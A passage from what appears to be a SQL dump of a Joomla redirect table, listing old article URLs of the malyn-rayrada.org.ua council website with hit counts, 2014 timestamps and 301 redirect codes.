20:20:49','0000-00-00 00:00:00',301),(1599,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=975:-2012-2015-&catid=49&Itemid=88&lang=uk','','','',10,0,'2014-09-17 20:20:53','0000-00-00 00:00:00',301),(1600,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1162:2013-12-19-06-13-29&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',6,0,'2014-09-17 20:21:32','0000-00-00 00:00:00',301),(1601,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=949:2013-03-06-12-51-36&catid=49:--12042013-&Itemid=88&lang=en','','','',8,0,'2014-09-17 20:21:58','0000-00-00 00:00:00',301),(1602,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=958:-2010-2015-&catid=49&Itemid=88&lang=ru','','','',12,0,'2014-09-17 20:22:27','0000-00-00 00:00:00',301),(1603,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=963:2013-03-13-06-16-53&catid=11&lang=en','','','',6,0,'2014-09-17 20:22:56','0000-00-00 00:00:00',301),(1604,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=954:-19-6-&catid=11&lang=ru','','','',5,0,'2014-09-17 20:24:25','0000-00-00 00:00:00',301),(1605,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1063:2013-08-02-17-32-04&catid=11&lang=ru&Itemid=','','','',3,0,'2014-09-17 20:25:01','0000-00-00 00:00:00',301),(1606,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1064:2013-08-09-07-52-21&catid=11&Itemid=14&lang=en','','','',10,0,'2014-09-17 20:25:50','0000-00-00 00:00:00',301),(1607,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=941:2013-02-27-14-30-15&catid=11&Itemid=14&lang=ru','','','',8,0,'2014-09-17 20:26:15','0000-00-00 00:00:00',301),(1608,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1021:---l---r&catid=36&Itemid=70&lang=en','','','',5,0,'2014-09-17 20:27:41','0000-00-00 00:00:00',301),(1609,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1214:2014-02-18-09-51-45&catid=11&Itemid=14&lang=en','','','',5,0,'2014-09-17 20:28:20','0000-00-00 00:00:00',301),(1610,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=949:2013-03-06-12-51-36&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',1,0,'2014-09-17 20:28:58','0000-00-00 00:00:00',301),(1611,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1135:2013-11-15-07-00-15&catid=54&Itemid=95&lang=ru','','','',7,0,'2014-09-17 20:29:55','0000-00-00 00:00:00',301),(1612,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1260:2014-03-31-11-32-51&catid=10&Itemid=17&lang=en','','','',9,0,'2014-09-17 20:29:57','0000-00-00 00:00:00',301),(1613,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1288:2014-04-23-06-50-40&catid=10:2010-06-05-13-46-44&Itemid=17&lang=uk','','','',7,0,'2014-09-17 20:30:29','0000-00-00 00:00:00',301),(1614,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1012:l-r&catid=11&Itemid=14&lang=en','','','',13,0,'2014-09-17 20:32:38','0000-00-00 00:00:00',301),(1615,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=957:199-&catid=11&lang=en','','','',4,0,'2014-09-17 20:32:49','0000-00-00 00:00:00',301),(1616,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1134:-25-6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',11,0,'2014-09-17 20:34:13','0000-00-00 00:00:00',301),(1617,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=965:2013-03-14-10-56-03&catid=11&lang=en','','','',7,0,'2014-09-17 20:34:56','0000-00-00 00:00:00',301),(1618,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=981:2013-04-03-07-23-01&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',10,0,'2014-09-17 20:35:05','0000-00-00 00:00:00',301),(1619,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1318:-3110&catid=59&Itemid=107&lang=uk','','','',6,0,'2014-09-17 20:35:54','0000-00-00 00:00:00',301),(1620,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1318:-3110&catid=59:--20062014-&Itemid=107&lang=en','','','',11,0,'2014-09-17 20:36:10','0000-00-00 00:00:00',301),(1621,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1268:---------------l-r&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',5,0,'2014-09-17 20:36:16','0000-00-00 00:00:00',301),(1622,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=945:2013-03-04-07-28-58&catid=49&Itemid=88&lang=uk','','','',7,0,'2014-09-17 20:36:37','0000-00-00 00:00:00',301),(1623,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1101:2013-10-03-07-11-01&catid=11&Itemid=14&lang=uk','','','',8,0,'2014-09-17 20:36:59','0000-00-00 00:00:00',301),(1624,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1082:------------2012-2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',9,0,'2014-09-17 20:37:31','0000-00-00 00:00:00',301),(1625,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=972:2013-03-19-10-50-05&catid=49:--12042013-&Itemid=88&lang=uk','','','',9,0,'2014-09-17 20:37:33','0000-00-00 00:00:00',301),(1626,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1051:--------4------&catid=51:--19072013-&Itemid=92&lang=ru','','','',18,0,'2014-09-17 20:38:35','0000-00-00 00:00:00',301),(1627,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1075:2013-09-06-09-25-33&catid=11&Itemid=14&lang=uk','','','',13,0,'2014-09-17 20:39:52','0000-00-00 00:00:00',301),(1628,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1290:2014-04-23-06-56-41&catid=10&Itemid=17&lang=en','','','',10,0,'2014-09-17 20:41:09','0000-00-00 00:00:00',301),(1629,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1122:-1-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',11,0,'2014-09-17 20:41:57','0000-00-00 00:00:00',301),(1630,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=919:2013-01-31-10-15-40&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',6,0,'2014-09-17 20:46:48','0000-00-00 00:00:00',301),(1631,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1113:2013-10-23-09-26-07&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',3,0,'2014-09-17 20:49:47','0000-00-00 00:00:00',301),(1632,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1034:2013-06-23-15-11-25&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',8,0,'2014-09-17 20:51:29','0000-00-00 00:00:00',301),(1633,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1034:2013-06-23-15-11-25&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',7,0,'2014-09-17 20:52:50','0000-00-00 00:00:00',301),(1634,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1075:2013-09-06-09-25-33&catid=11&Itemid=14&lang=en','','','',4,0,'2014-09-17 20:59:58','0000-00-00 00:00:00',301),(1635,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1116:-2013-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',17,0,'2014-09-17 21:00:42','0000-00-00 00:00:00',301),(1636,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1123:-2013-&catid=53:--25102013-&Itemid=94&lang=en','','','',13,0,'2014-09-17 21:05:36','0000-00-00 00:00:00',301),(1637,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1057:--22072013--2100-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',11,0,'2014-09-17 21:06:42','0000-00-00 00:00:00',301),(1638,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1059:2013-07-24-05-42-15&catid=11&lang=en&Itemid=','','','',6,0,'2014-09-17 21:09:03','0000-00-00 00:00:00',301),(1639,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1058:-2013-&catid=51:--19072013-&Itemid=92&lang=uk','','','',9,0,'2014-09-17 21:09:40','0000-00-00 00:00:00',301),(1640,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1075:2013-09-06-09-25-33&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',7,0,'2014-09-17 21:10:01','0000-00-00 00:00:00',301),(1641,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=979:2013-03-29-09-18-27&catid=11&Itemid=14&lang=en','','','',7,0,'2014-09-17 21:10:25','0000-00-00 00:00:00',301),(1642,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=986:-20-&catid=11&lang=ru','','','',4,0,'2014-09-17 21:18:13','0000-00-00 00:00:00',301),(1643,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=991:2013-04-22-08-24-54&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',7,0,'2014-09-17 21:18:23','0000-00-00 00:00:00',301),(1644,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=923:-17-&catid=11&lang=uk','','','',4,0,'2014-09-17 21:20:21','0000-00-00 00:00:00',301),(1645,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=919:2013-01-31-10-15-40&catid=11&lang=uk&Itemid=','','','',4,0,'2014-09-17 21:20:32','0000-00-00 00:00:00',301),(1646,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1205:2014-01-31-07-53-03&catid=56:--03022014-&Itemid=97&lang=en','','','',23,0,'2014-09-17 21:21:25','0000-00-00 00:00:00',301),(1647,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=897:2013-01-18-07-40-55&catid=47:-21022013-&Itemid=86&lang=ru','','','',6,0,'2014-09-17 21:21:29','0000-00-00 00:00:00',301),(1648,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=930:2013-02-21-09-13-00&catid=47&Itemid=86&lang=ru','','','',10,0,'2014-09-17 21:21:46','0000-00-00 00:00:00',301),(1649,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1115:-24-&catid=11&Itemid=14&lang=en','','','',9,0,'2014-09-17 21:22:11','0000-00-00 00:00:00',301),(1650,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=876:2012-12-18-09-32-45&catid=46&Itemid=85&lang=ru','','','',2,0,'2014-09-17 21:23:01','0000-00-00 00:00:00',301),(1651,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1082:-2012-2015-&catid=53&Itemid=94&lang=uk','','','',8,0,'2014-09-17 21:23:03','0000-00-00 00:00:00',301),(1652,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1049:2013-07-15-05-50-46&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',8,0,'2014-09-17 21:23:32','0000-00-00 00:00:00',301),(1653,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1154:7-&catid=11&Itemid=14&lang=uk','','','',10,0,'2014-09-17 21:30:41','0000-00-00 00:00:00',301),(1654,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1195:2014-01-28-13-01-27&Itemid=97&lang=uk','','','',2,0,'2014-09-17 21:31:13','0000-00-00 00:00:00',301),(1655,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1192:-2014-2015-&Itemid=70&lang=en','','','',2,0,'2014-09-17 21:31:14','0000-00-00 00:00:00',301),(1656,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1190:------------2014--&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',13,0,'2014-09-17 21:31:16','0000-00-00 00:00:00',301),(1657,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1188:2014-01-28-09-45-21&Itemid=97&lang=uk','','','',4,0,'2014-09-17 21:31:17','0000-00-00 00:00:00',301),(1658,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1188:2014-01-28-09-45-21&Itemid=97&lang=ru','','','',4,0,'2014-09-17 21:31:18','0000-00-00 00:00:00',301),(1659,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1186:-2013-i-2014-&catid=56&Itemid=97&lang=uk','','','',8,0,'2014-09-17 21:31:21','0000-00-00 00:00:00',301),(1660,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1116:-2013-&catid=11&lang=ru','','','',7,0,'2014-09-17 21:31:22','0000-00-00 00:00:00',301),(1661,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1054:2013-07-19-11-38-20&Itemid=92&lang=en','','','',2,0,'2014-09-17 21:31:43','0000-00-00 00:00:00',301),(1662,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1038:2013-06-28-10-19-47&catid=11&lang=ru','','','',4,0,'2014-09-17 21:31:47','0000-00-00 00:00:00',301),(1663,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1001:2013-04-30-12-14-17&catid=11&lang=ru','','','',4,0,'2014-09-17 21:32:21','0000-00-00 00:00:00',301),(1664,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1356:2014-07-03-06-32-02&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',9,0,'2014-09-17 21:32:28','0000-00-00 00:00:00',301),(1665,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1341:-----------------14052014-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',7,0,'2014-09-17 21:32:29','0000-00-00 00:00:00',301),(1666,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1240:2014-03-17-07-01-32&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',13,0,'2014-09-17 21:32:31','0000-00-00 00:00:00',301),(1667,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1246:-2013-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',12,0,'2014-09-17 21:32:31','0000-00-00 00:00:00',301),(1668,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1203:-2014-&Itemid=97&lang=uk','','','',2,0,'2014-09-17 21:32:32','0000-00-00 00:00:00',301),(1669,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=3&Itemid=7&lang=en','','','',21,0,'2014-09-17 21:33:24','0000-00-00 00:00:00',301),(1670,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=992:-3-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',9,0,'2014-09-17 21:33:31','0000-00-00 00:00:00',301),(1671,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=990:-2013-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',2,0,'2014-09-17 21:33:32','0000-00-00 00:00:00',301),(1672,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=986:-20-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',10,0,'2014-09-17 21:33:33','0000-00-00 00:00:00',301),(1673,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=947:-----lr--2012-2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',5,0,'2014-09-17 21:33:35','0000-00-00 00:00:00',301),(1674,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=945:2013-03-04-07-28-58&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',5,0,'2014-09-17 21:33:36','0000-00-00 00:00:00',301),(1675,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=935:----------14-112012332-l------r&catid=47:-21022013-&Itemid=86&lang=en','','','',6,0,'2014-09-17 21:33:37','0000-00-00 00:00:00',301),(1676,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=914:2013-01-23-13-21-28&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',5,0,'2014-09-17 21:33:38','0000-00-00 00:00:00',301),(1677,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1349:-31-&catid=11&lang=ru','','','',8,0,'2014-09-17 21:35:12','0000-00-00 00:00:00',301),(1678,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1349:-31-&catid=11&Itemid=14&lang=ru','','','',4,0,'2014-09-17 21:35:13','0000-00-00 00:00:00',301),(1679,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1282:-30-6-&catid=11&lang=ru','','','',3,0,'2014-09-17 21:35:14','0000-00-00 00:00:00',301),(1680,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1281:2014-04-15-09-13-01&catid=57&Itemid=98&lang=ru','','','',4,0,'2014-09-17 21:35:15','0000-00-00 00:00:00',301),(1681,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1275:2014-04-10-13-24-47&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',15,0,'2014-09-17 21:35:16','0000-00-00 00:00:00',301),(1682,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1268:-l-r&catid=57&Itemid=98&lang=ru','','','',4,0,'2014-09-17 21:35:17','0000-00-00 00:00:00',301),(1683,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1254:-1-50&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',10,0,'2014-09-17 21:35:17','0000-00-00 00:00:00',301),(1684,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1248:2014-03-21-18-16-44&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',6,0,'2014-09-17 21:35:18','0000-00-00 00:00:00',301),(1685,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1243:2014-03-17-07-32-47&catid=57:--15042014-&Itemid=98&lang=uk','','','',5,0,'2014-09-17 21:35:19','0000-00-00 00:00:00',301),(1686,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1243:2014-03-17-07-32-47&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',7,0,'2014-09-17 21:35:20','0000-00-00 00:00:00',301),(1687,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1239:--29----6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',3,0,'2014-09-17 21:35:21','0000-00-00 00:00:00',301),(1688,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1233:2014-03-03-10-28-35&catid=11&lang=ru','','','',6,0,'2014-09-17 21:35:22','0000-00-00 00:00:00',301),(1689,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1216:-q-q&lang=ru','','','',2,0,'2014-09-17 21:35:23','0000-00-00 00:00:00',301),(1690,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1202:2014-01-31-07-45-54&Itemid=97&lang=ru','','','',2,0,'2014-09-17 21:35:24','0000-00-00 00:00:00',301),(1691,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1195:2014-01-28-13-01-27&Itemid=70&lang=uk','','','',2,0,'2014-09-17 21:35:25','0000-00-00 00:00:00',301),(1692,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1195:2014-01-28-13-01-27&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',14,0,'2014-09-17 21:35:26','0000-00-00 00:00:00',301),(1693,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1193:-2014-2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',9,0,'2014-09-17 21:35:27','0000-00-00 00:00:00',301),(1694,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1190:-2014-&Itemid=97&lang=uk','','','',2,0,'2014-09-17 21:35:28','0000-00-00 00:00:00',301),(1695,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1189:2014-01-28-09-46-45&Itemid=70&lang=ru','','','',2,0,'2014-09-17 21:35:30','0000-00-00 00:00:00',301),(1696,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1188:2014-01-28-09-45-21&catid=56&Itemid=97&lang=ru','','','',15,0,'2014-09-17 21:35:31','0000-00-00 00:00:00',301),(1697,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1188:2014-01-28-09-45-21&catid=56&Itemid=97&lang=uk','','','',17,0,'2014-09-17 21:35:32','0000-00-00 00:00:00',301),(1698,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1185:2014-01-28-09-38-54&catid=56&Itemid=97&lang=uk','','','',17,0,'2014-09-17 21:35:34','0000-00-00 00:00:00',301),(1699,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1181:2014-01-22-06-06-13&lang=en','','','',3,0,'2014-09-17 21:35:35','0000-00-00 00:00:00',301),(1700,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1153:-2013-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',13,0,'2014-09-17 21:35:35','0000-00-00 00:00:00',301),(1701,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1139:---------14112013--84-l--25-----6-r&catid=11&lang=ru','','','',7,0,'2014-09-17 21:35:36','0000-00-00 00:00:00',301),(1702,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1111:2013-10-22-16-06-36&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',16,0,'2014-09-17 21:38:17','0000-00-00 00:00:00',301),(1703,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1107:c-&catid=11&Itemid=14&lang=uk','','','',8,0,'2014-09-17 21:38:18','0000-00-00 00:00:00',301),(1704,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1103:2013-10-03-09-29-30&catid=11&lang=uk&Itemid=','','','',5,0,'2014-09-17 21:38:20','0000-00-00 00:00:00',301),(1705,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1103:2013-10-03-09-29-30&catid=11&lang=ru&Itemid=','','','',7,0,'2014-09-17 21:38:21','0000-00-00 00:00:00',301),(1706,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1069:23--------&catid=11&lang=ru','','','',6,0,'2014-09-17 21:38:24','0000-00-00 00:00:00',301),(1707,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1051:--------4------&Itemid=92&lang=ru','','','',2,0,'2014-09-17 21:38:29','0000-00-00 00:00:00',301),(1708,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1024:-l-2011-2014-r-&Itemid=92&lang=uk','','','',3,0,'2014-09-17 21:38:32','0000-00-00 00:00:00',301),(1709,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1012:l-r&catid=11&lang=ru','','','',3,0,'2014-09-17 21:38:33','0000-00-00 00:00:00',301),(1710,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1223:--28-----6-&catid=11&Itemid=14&lang=en','','','',7,0,'2014-09-17 21:41:32','0000-00-00 00:00:00',301),(1711,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=999:2013-04-28-05-21-05&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',6,0,'2014-09-17 21:41:49','0000-00-00 00:00:00',301),(1712,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=992:-3-&catid=11&Itemid=14&lang=uk','','','',13,0,'2014-09-17 21:41:50','0000-00-00 00:00:00',301),(1713,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=982:2013-04-03-11-58-18&catid=49&Itemid=88&lang=en','','','',4,0,'2014-09-17 21:41:51','0000-00-00 00:00:00',301),(1714,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=939:-18-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',10,0,'2014-09-17 21:41:52','0000-00-00 00:00:00',301),(1715,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=915:--------14--2012--340-l---------2012-2013-------------&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',4,0,'2014-09-17 21:41:53','0000-00-00 00:00:00',301),(1716,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=894:-2013-2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',3,0,'2014-09-17 21:41:55','0000-00-00 00:00:00',301),(1717,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=939:-18-&catid=11&lang=en','','','',3,0,'2014-09-17 21:43:32','0000-00-00 00:00:00',301),(1718,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=961:2013-03-11-10-51-56&catid=48:--11032013-&Itemid=87&lang=en','','','',5,0,'2014-09-17 21:47:26','0000-00-00 00:00:00',301),(1719,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1237:-200-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',18,0,'2014-09-17 21:49:51','0000-00-00 00:00:00',301),(1720,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1140:80-1932-33-l-r&catid=11&Itemid=14&lang=en','','','',13,0,'2014-09-17 21:50:17','0000-00-00 00:00:00',301),(1721,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1056:-22-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',10,0,'2014-09-17 21:50:31','0000-00-00 00:00:00',301),(1722,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1018:2013-06-06-11-22-34&catid=11&Itemid=14&lang=en','','','',4,0,'2014-09-17 21:50:57','0000-00-00 00:00:00',301),(1723,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=879:2012-12-21-17-02-01&catid=46&Itemid=85&lang=ru','','','',5,0,'2014-09-17 21:50:59','0000-00-00 00:00:00',301),(1724,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=887:-2013-&catid=11&lang=en','','','',5,0,'2014-09-17 21:51:52','0000-00-00 00:00:00',301),(1725,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=887:-2013-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',7,0,'2014-09-17 21:53:54','0000-00-00 00:00:00',301),(1726,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1047:2013-07-10-05-51-36&catid=36&Itemid=70&lang=uk','','','',6,0,'2014-09-17 21:54:27','0000-00-00 00:00:00',301),(1727,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1089:--------l---r---&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',9,0,'2014-09-17 21:54:45','0000-00-00 00:00:00',301),(1728,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1268:-l-r&catid=57&Itemid=98&lang=uk','','','',7,0,'2014-09-17 21:54:57','0000-00-00 00:00:00',301),(1729,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=880:2012-12-21-17-03-54&catid=46:--21122012&Itemid=85&lang=uk','','','',3,0,'2014-09-17 21:55:19','0000-00-00 00:00:00',301),(1730,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1315:-31-6-&catid=11&Itemid=14&lang=ru','','','',12,0,'2014-09-17 21:55:21','0000-00-00 00:00:00',301),(1731,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=907:2013-01-21-08-54-59&catid=47:--21022013-&Itemid=86&lang=ru','','','',6,0,'2014-09-17 21:56:01','0000-00-00 00:00:00',301),(1732,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1025:-2011-2015-&catid=51:--19072013-&Itemid=92&lang=en','','','',7,0,'2014-09-17 21:56:24','0000-00-00 00:00:00',301),(1733,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1010:-22-6-&catid=11&Itemid=14&lang=ru','','','',4,0,'2014-09-17 21:57:03','0000-00-00 00:00:00',301),(1734,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=994:2013-04-23-08-30-51&catid=50:--23042013-&Itemid=90&lang=en','','','',11,0,'2014-09-17 21:57:32','0000-00-00 00:00:00',301),(1735,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1017:-2013-&catid=11&Itemid=14&lang=uk','','','',6,0,'2014-09-17 21:57:36','0000-00-00 00:00:00',301),(1736,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=954:-19-6-&catid=11&lang=ru&Itemid=','','','',2,0,'2014-09-17 21:58:33','0000-00-00 